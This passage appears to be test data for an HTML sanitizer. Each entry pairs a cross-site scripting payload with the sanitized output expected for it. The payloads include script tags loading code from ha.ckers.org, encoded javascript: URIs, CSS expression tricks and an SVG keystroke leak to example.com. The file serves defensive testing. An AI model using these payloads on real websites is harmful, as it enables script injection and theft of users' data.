    526    data: '<script src="/\\example.com\\foo.js"></script> // Safari 5.0, Chrome 9, 10\n<script src="\\\\example.com\\foo.js"></script> // Safari 5.0',
    527    sanitized:
    528      "<html><head> </head><body>// Safari 5.0, Chrome 9, 10\n // Safari 5.0</body></html>",
    529  },
    530  {
    531    data: '<?xml version="1.0"?>\r\n<?xml-stylesheet type="text/xml" href="#stylesheet"?>\r\n<!DOCTYPE doc [\r\n<!ATTLIST xsl:stylesheet\r\n  id    ID    #REQUIRED>]>\r\n<svg xmlns="http://www.w3.org/2000/svg">\r\n    <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">\r\n        <xsl:template match="/">\r\n            <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"></iframe>\r\n        </xsl:template>\r\n    </xsl:stylesheet>\r\n    <circle fill="red" r="40"></circle>\r\n</svg>',
    532    sanitized:
    533      "<!DOCTYPE doc>\n<html><head></head><body>]&gt;\n\n    \n        \n            \n        \n    \n    \n</body></html>",
    534  },
    535  {
    536    data: '<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>\r\n<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>',
    537    sanitized: "<html><head></head><body>\n</body></html>",
    538  },
    539  {
    540    data: '<svg xmlns="http://www.w3.org/2000/svg" id="x">\r\n<listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>\r\n<handler id="y">alert(1)</handler>\r\n</svg>',
    541    sanitized: "<html><head></head><body>\n\nalert(1)\n</body></html>",
    542  },
    543  {
    544    data: "<svg><style>&lt;img/src=x onerror=alert(1)// </b>",
    545    sanitized: "<html><head></head><body></body></html>",
    546  },
    547  {
    548    data: "<svg>\n<image style='filter:url(\"data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>\")'>\n<!--\nSame effect with\n<image filter='...'>\n-->\n</svg>",
    549    sanitized: "<html><head></head><body>\n\n\n</body></html>",
    550  },
    551  {
    552    data: '<math href="javascript:alert(1)">CLICKME</math>\r\n\r\n<math>\r\n<!-- up to FF 13 -->\r\n<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>\r\n\r\n<!-- FF 14+ -->\r\n<maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction>\r\n</math>',
    553    sanitized:
    554      '<html><head></head><body><math>CLICKME</math>\n\n<math>\n\n<maction actiontype="statusline#http://google.com">CLICKME</maction>\n\n\n<maction actiontype="statusline">CLICKME<mtext>http://http://google.com</mtext></maction>\n</math></body></html>',
    555  },
    556  {
    557    data: "<b>drag and drop one of the following strings to the drop box:</b>\r\n<br/><hr/>\r\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b>\r\n<br/><hr/>\r\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\n<div id=\"dropbox\" style=\"height: 360px;width: 500px;border: 5px solid #000;position: relative;\" ondragover=\"event.preventDefault()\">+ Drop Box +</div>",
    558    sanitized:
    559      "<html><head></head><body><b>drag and drop one of the following strings to the drop box:</b>\n<br><hr>\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\nfeed:data:text/html,&lt;script&gt;alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&lt;/script&gt;&lt;b&gt;\n<br><hr>\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\n<div id=\"dropbox\">+ Drop Box +</div></body></html>",
    560  },
    561  {
    562    data: '<!doctype html>\r\n<form>\r\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\r\n<br>\r\n<input name="secret" type="password">\r\n</form>\r\n<!-- injection --><svg height="50px">\r\n<image xmlns:xlink="http://www.w3.org/1999/xlink">\r\n<set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />\r\n<set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" />\r\n<set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" />\r\n<set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" />\r\n</image>\r\n</svg>',
    563    sanitized:
    564      "<!DOCTYPE html>\n<html><head></head><body>\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\n<br>\n\n\n\n\n\n\n\n\n\n</body></html>",
    565  },
    566  {
    567    data: "<!-- `<img/src=xx:xx onerror=alert(1)//--!>",
    568    sanitized: "<html><head></head><body></body></html>",
    569  },
    570  {
    571    data: "<xmp>\r\n<%\r\n</xmp>\r\n<img alt='%></xmp><img src=xx:x onerror=alert(1)//'>\r\n\r\n<script>\r\nx='<%'\r\n</script> %>/\r\nalert(2)\r\n</script>\r\n\r\nXXX\r\n<style>\r\n*['<!--']{}\r\n</style>\r\n-->{}\r\n*{color:red}</style>",
    572    sanitized:
    573      '<html><head></head><body>\n&lt;%\n\n<img alt="%&gt;&lt;/xmp&gt;&lt;img src=xx:x onerror=alert(1)//">\n\n %&gt;/\nalert(2)\n\n\nXXX\n\n--&gt;{}\n*{color:red}</body></html>',
    574  },
    575  {
    576    data: '<form action="" method="post">\r\n<input name="username" value="admin" />\r\n<input name="password" type="password" value="secret" />\r\n<input name="injected" value="injected" dirname="password" />\r\n<input type="submit">\r\n</form>',
    577    sanitized: "<html><head></head><body>\n\n\n\n\n</body></html>",
    578  },
    579  {
    580    data: "<SCRIPT>alert('XSS');</SCRIPT>",
    581    sanitized: "<html><head></head><body></body></html>",
    582  },
    583  {
    584    data: "'';!--\"<XSS>=&{()}",
    585    sanitized: "<html><head></head><body>'';!--\"=&amp;{()}</body></html>",
    586  },
    587  {
    588    data: "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
    589    sanitized: "<html><head></head><body></body></html>",
    590  },
    591  {
    592    data: "<IMG SRC=\"javascript:alert('XSS');\">",
    593    sanitized: "<html><head></head><body><img></body></html>",
    594  },
    595  {
    596    data: "<IMG SRC=javascript:alert('XSS')>",
    597    sanitized: "<html><head></head><body><img></body></html>",
    598  },
    599  {
    600    data: "<IMG SRC=JaVaScRiPt:alert('XSS')>",
    601    sanitized: "<html><head></head><body><img></body></html>",
    602  },
    603  {
    604    data: "<IMG SRC=javascript:alert(&quot;XSS&quot;)>",
    605    sanitized: "<html><head></head><body><img></body></html>",
    606  },
    607  {
    608    data: "<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>",
    609    sanitized: "<html><head></head><body><img></body></html>",
    610  },
    611  {
    612    data: "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    613    sanitized: "<html><head></head><body><img></body></html>",
    614  },
    615  {
    616    data: "SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>",
    617    sanitized: "<html><head></head><body>SRC=\n<img></body></html>",
    618  },
    619  {
    620    data: "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>",
    621    sanitized: "<html><head></head><body><img></body></html>",
    622  },
    623  {
    624    data: "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",
    625    sanitized: "<html><head></head><body><img></body></html>",
    626  },
    627  {
    628    data: "<IMG SRC=\"javascript:alert('XSS');\">",
    629    sanitized: "<html><head></head><body><img></body></html>",
    630  },
    631  {
    632    data: "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
    633    sanitized: "<html><head></head><body><img></body></html>",
    634  },
    635  {
    636    data: "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
    637    sanitized: "<html><head></head><body><img></body></html>",
    638  },
    639  {
    640    data: "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
    641    sanitized: "<html><head></head><body><img></body></html>",
    642  },
    643  {
    644    data: "<IMG SRC=\" &#14;  javascript:alert('XSS');\">",
    645    sanitized: "<html><head></head><body><img></body></html>",
    646  },
    647  {
    648    data: '<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
    649    sanitized: "<html><head></head><body></body></html>",
    650  },
    651  {
    652    data: "<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>",
    653    sanitized: "<html><head></head><body></body></html>",
    654  },
    655  {
    656    data: "<IMG SRC=\"javascript:alert('XSS')\"",
    657    sanitized: "<html><head></head><body></body></html>",
    658  },
    659  {
    660    data: "<SCRIPT>a=/XSS/",
    661    sanitized: "<html><head></head><body></body></html>",
    662  },
    663  {
    664    data: "\\\";alert('XSS');//",
    665    sanitized: "<html><head></head><body>\\\";alert('XSS');//</body></html>",
    666  },
    667  {
    668    data: '<INPUT TYPE="IMAGE" SRC="javascript:alert(\'XSS\');">',
    669    sanitized: "<html><head></head><body></body></html>",
    670  },
    671  {
    672    data: "<BODY BACKGROUND=\"javascript:alert('XSS')\">",
    673    sanitized: "<html><head></head><body></body></html>",
    674  },
    675  {
    676    data: "<BODY ONLOAD=alert('XSS')>",
    677    sanitized: "<html><head></head><body></body></html>",
    678  },
    679  {
    680    data: "<IMG DYNSRC=\"javascript:alert('XSS')\">",
    681    sanitized: "<html><head></head><body><img></body></html>",
    682  },
    683  {
    684    data: "<IMG LOWSRC=\"javascript:alert('XSS')\">",
    685    sanitized: "<html><head></head><body><img></body></html>",
    686  },
    687  {
    688    data: "<BGSOUND SRC=\"javascript:alert('XSS');\">",
    689    sanitized: "<html><head></head><body></body></html>",
    690  },
    691  {
    692    data: "<BR SIZE=\"&{alert('XSS')}\">",
    693    sanitized: "<html><head></head><body><br></body></html>",
    694  },
    695  {
    696    data: '<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>',
    697    sanitized: "<html><head></head><body></body></html>",
    698  },
    699  {
    700    data: '<LINK REL="stylesheet" HREF="javascript:alert(\'XSS\');">',
    701    sanitized: "<html><head></head><body></body></html>",
    702  },
    703  {
    704    data: '<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">',
    705    sanitized: "<html><head></head><body></body></html>",
    706  },
    707  {
    708    data: "<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>",
    709    sanitized: "<html><head></head><body></body></html>",
    710  },
    711  {
    712    data: '<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">',
    713    sanitized: "<html><head></head><body></body></html>",
    714  },
    715  {
    716    data: '<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>',
    717    sanitized: "<html><head></head><body></body></html>",
    718  },
    719  {
    720    data: "<IMG SRC='vbscript:msgbox(\"XSS\")'>",
    721    sanitized: "<html><head></head><body><img></body></html>",
    722  },
    723  {
    724    data: '<IMG SRC="mocha:[code]">',
    725    sanitized: "<html><head></head><body><img></body></html>",
    726  },
    727  {
    728    data: '<IMG SRC="livescript:[code]">',
    729    sanitized: "<html><head></head><body><img></body></html>",
    730  },
    731  {
    732    data: '<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'XSS\');">',
    733    sanitized: "<html><head></head><body></body></html>",
    734  },
    735  {
    736    data: '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">',
    737    sanitized: "<html><head></head><body></body></html>",
    738  },
    739  {
    740    data: '<META HTTP-EQUIV="Link" Content="<javascript:alert(\'XSS\')>; REL=stylesheet">',
    741    sanitized: "<html><head></head><body></body></html>",
    742  },
    743  {
    744    data: '<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(\'XSS\');">',
    745    sanitized: "<html><head></head><body></body></html>",
    746  },
    747  {
    748    data: "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
    749    sanitized: "<html><head></head><body></body></html>",
    750  },
    751  {
    752    data: "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>",
    753    sanitized: "<html><head></head></html>",
    754  },
    755  {
    756    data: "<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
    757    sanitized: "<html><head></head><body><table></table></body></html>",
    758  },
    759  {
    760    data: "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
    761    sanitized: "<html><head></head><body><div></div></body></html>",
    762  },
    763  {
    764    data: "<DIV STYLE=\"background-image: url(&#1;javascript:alert('XSS'))\">",
    765    sanitized: "<html><head></head><body><div></div></body></html>",
    766  },
    767  {
    768    data: "<DIV STYLE=\"width: expression(alert('XSS'));\">",
    769    sanitized: "<html><head></head><body><div></div></body></html>",
    770  },
    771  {
    772    data: "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>",
    773    sanitized: "<html><head></head><body></body></html>",
    774  },
    775  {
    776    data: "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">",
    777    sanitized: "<html><head></head><body><img></body></html>",
    778  },
    779  {
    780    data: "<XSS STYLE=\"xss:expression(alert('XSS'))\">",
    781    sanitized: "<html><head></head><body></body></html>",
    782  },
    783  {
    784    data: 'exp/*<XSS STYLE=\'no\\xss:noxss("*//*");',
    785    sanitized: "<html><head></head><body>exp/*</body></html>",
    786  },
    787  {
    788    data: "<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>",
    789    sanitized: "<html><head></head><body></body></html>",
    790  },
    791  {
    792    data: "<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>",
    793    sanitized: '<html><head></head><body><a class="XSS"></a></body></html>',
    794  },
    795  {
    796    data: '<STYLE type="text/css">BODY{background:url("javascript:alert(\'XSS\')")}</STYLE>',
    797    sanitized: "<html><head></head><body></body></html>",
    798  },
    799  {
    800    data: "<BASE HREF=\"javascript:alert('XSS');//\">",
    801    sanitized: "<html><head></head><body></body></html>",
    802  },
    803  {
    804    data: '<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>',
    805    sanitized: "<html><head></head><body></body></html>",
    806  },
    807  {
    808    data: "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>",
    809    sanitized: "<html><head></head><body></body></html>",
    810  },
    811  {
    812    data: "getURL(\"javascript:alert('XSS')\")",
    813    sanitized:
    814      "<html><head></head><body>getURL(\"javascript:alert('XSS')\")</body></html>",
    815  },
    816  {
    817    data: 'a="get";',
    818    sanitized: '<html><head></head><body>a="get";</body></html>',
    819  },
    820  {
    821    data: "<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas<![CDATA[cript:alert('XSS');\">",
    822    sanitized: "<html><head></head><body></body></html>",
    823  },
    824  {
    825    data: '<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>',
    826    sanitized: "<html><head></head><body></body></html>",
    827  },
    828  {
    829    data: "<HTML><BODY>",
    830    sanitized: "<html><head></head><body></body></html>",
    831  },
    832  {
    833    data: '<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>',
    834    sanitized: "<html><head></head><body></body></html>",
    835  },
    836  {
    837    data: "<!--#exec cmd=\"/bin/echo '<SCRIPT SRC'\"--><!--#exec cmd=\"/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'\"-->",
    838    sanitized: "<html><head></head><body></body></html>",
    839  },
    840  {
    841    data: "<? echo('<SCR)';",
    842    sanitized: "<html><head></head><body></body></html>",
    843  },
    844  {
    845    data: '<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert(\'XSS\')&lt;/SCRIPT&gt;">',
    846    sanitized: "<html><head></head><body></body></html>",
    847  },
    848  {
    849    data: '<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(\'XSS\');+ADw-/SCRIPT+AD4-',
    850    sanitized:
    851      "<html><head> </head><body>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</body></html>",
    852  },
    853  {
    854    data: '<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
    855    sanitized: "<html><head></head><body></body></html>",
    856  },
    857  {
    858    data: '<SCRIPT a=">" \'\' SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
    859    sanitized: "<html><head></head><body></body></html>",
    860  },
    861  {
    862    data: '<SCRIPT "a=\'>\'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
    863    sanitized: "<html><head></head><body></body></html>",
    864  },
    865  {
    866    data: '<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
    867    sanitized: "<html><head></head><body></body></html>",
    868  },
    869  {
    870    data: '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC',
    871    sanitized: "<html><head></head><body>PT SRC</body></html>",
    872  },
    873  {
    874    data: "",
    875    sanitized: "<html><head></head><body></body></html>",
    876  },
    877  {
    878    data: "<dialog>allowed</dialog>",
    879    sanitized:
    880      "<html><head></head><body><dialog>allowed</dialog></body></html>",
    881  },
    882  {
    883    data: "<main>allowed</main>",
    884    sanitized: "<html><head></head><body><main>allowed</main></body></html>",
    885  },
    886  {
    887    data: "<picture>allowed</picture>",
    888    sanitized:
    889      "<html><head></head><body><picture>allowed</picture></body></html>",
    890  },
    891  {
    892    data: "<template>allowed</template>",
    893    sanitized:
    894      "<html><head><template>allowed</template></head><body></body></html>",
    895  },
    896  {
    897    // traverse into HTML template elements
    898    data: '<template><img src="x" onerror="alert(1)"></template>',
    899    sanitized:
    900      "<html><head><template><img></template></head><body></body></html>",
    901  },
    902  {
    903    // do not traverse into SVG template elements (that's not a thing)
    904    data: "<svg><template></template></svg>",
    905    sanitized: "<html><head></head><body></body></html>",
    906  },
    907  {
    908    data: "<svg><use href='http://example.com/test.svg'></svg>",
    909    flags: 1, // ParserUtils.SanitizerAllowStyle
    910    sanitized: "<html><head></head><body><svg><use></use></svg></body></html>",
    911  },
    912  {
    913    // fragments that reference the same document are allowed.
    914    data: "<svg><use href='#x'></svg>",
    915    flags: 1, // ParserUtils.SanitizerAllowStyle
    916    sanitized:
    917      '<html><head></head><body><svg><use href="#x"></use></svg></body></html>',
    918  },
    919  {
    920    data: '<svg><use xlink:href="http://example/#baz"/></svg>',
    921    flags: 1, // ParserUtils.SanitizerAllowStyle
    922    sanitized: "<html><head></head><body><svg><use></use></svg></body></html>",
    923  },
    924 ];